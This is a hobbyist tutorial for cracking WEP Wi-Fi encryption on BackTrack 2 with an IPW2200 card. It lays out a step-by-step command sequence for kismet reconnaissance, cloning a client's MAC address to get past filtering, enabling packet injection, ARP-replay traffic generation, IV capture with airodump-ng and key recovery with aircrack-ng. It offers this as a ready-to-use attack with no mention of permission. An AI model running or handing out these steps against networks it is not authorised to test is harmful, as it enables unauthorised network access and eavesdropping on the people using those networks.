Cracking WEP on Backtrack v2 with Aircrack-ng and an IPW2200 (Centrino)
-------------
Links:
BackTrack 2 - http://remote-exploit.org/backtrack.html
IPW2200 Injection Patch - http://tinyshell.be/aircrackng/forum/index.php?topic=400.0
-------------
Incredibly Short Legend:
ESSID = SSID (network name, whatever you want to call it)
BSSID = MAC Address
-------------
First we prep the device.  Luckily for us, the backtrack team has
already patched our driver.  If you're not running backtrack v2, you
will need to patch your driver for injection.  Tutorials for this are in
several locations, please bump them on Google if you get the chance.
-------------
# a little bit of recon
# write down your ipw2200 MAC address
ifconfig eth0

# **If they're filtering MAC addresses, you'll need to detect a client (below)
# and clone a valid client's MAC address.
# You can change your MAC by typing.
# --------------
# ifconfig eth0 hw ether <MAC-TO-CLONE>
# --------------
# If you do this, anywhere below that I meantion "your" MAC address,
# I am referring to the cloned MAC address

# open /usr/local/etc/kismet.conf in your favorite editor
# nano and pico are good for linux newbies
# set the 'source' line to reflect ipw2200 like so:
source=ipw2200,eth0,bullshit

# save and run kismet
kismet

# first, hit 'm' to mute the annoying sounds
# then hit 's'and again 'S' to sort by SSID
# let it run for a minute so it can grab a lot of information
# select your target and press [return] to see the information
# **Write down your targets ESSID, BSSID and CHANNEL**
# If you press 'c' you can see a list of clients it may have identified
# these can be useful so if there are any, jot them down as well
Shift-Q to quit kismet
-------------
# enable the rtap interface
rmmod ipw2200
modprobe ipw2200 rtap_iface=1

# setup a fake connection to the access point
# don't worry, it doesn't have to work
# an invalid key is fine for this purpose
iwconfig eth0 ap <AP BSSID>
iwconfig eth0 key s:bullshit
iwconfig eth0 mode managed

# now we bring up both interfaces
ifconfig eth0 up
ifconfig rtap0 up
-------------
Now that the device is prepared, we can start capturing and generating traffic
You will need 2 consoles for this and another if you plan to start
cracking the key while still capturing and generating traffic.  Aircrack
is advanced enough to accept new IVs, so this is not a bad idea.  It
allows us to start aircrack "early" and crack weaker keys faster.
-------------
# start capturing traffic
airodump-ng --channel <channel> --bssid <AP BSSID> --ivs --write <base filename> rtap0

# start generating traffic
aireplay-ng --arpreplay -b <AP BSSID> -h <your MAC address> -i rtap0 eth0
-------------
After we capture about 200,000 IVs, I start aircrack-ng to try and crack
the key as quickly as possible.
-------------
aircrack-ng -a 1 <your base filename>.ivs

# if it doesn't crack, increase the fudge factor
# it's not a bad idea to multiply it by 2 for each attempt
aircrack-ng -a 1 -f 4 <your base filename>.ivs
-------------
# Screenshot of all three running:
http://kefkahacks.net/~kefka/images/snapshot1.png
# Screenshot of all three running and aircrack-ng success!
http://kefkahacks.net/~kefka/images/snapshot2.png
-------------
Enjoy!
http://kefkahacks.net/~kefka/diewep.txt

Thanks to everyone who made this much easier than it is.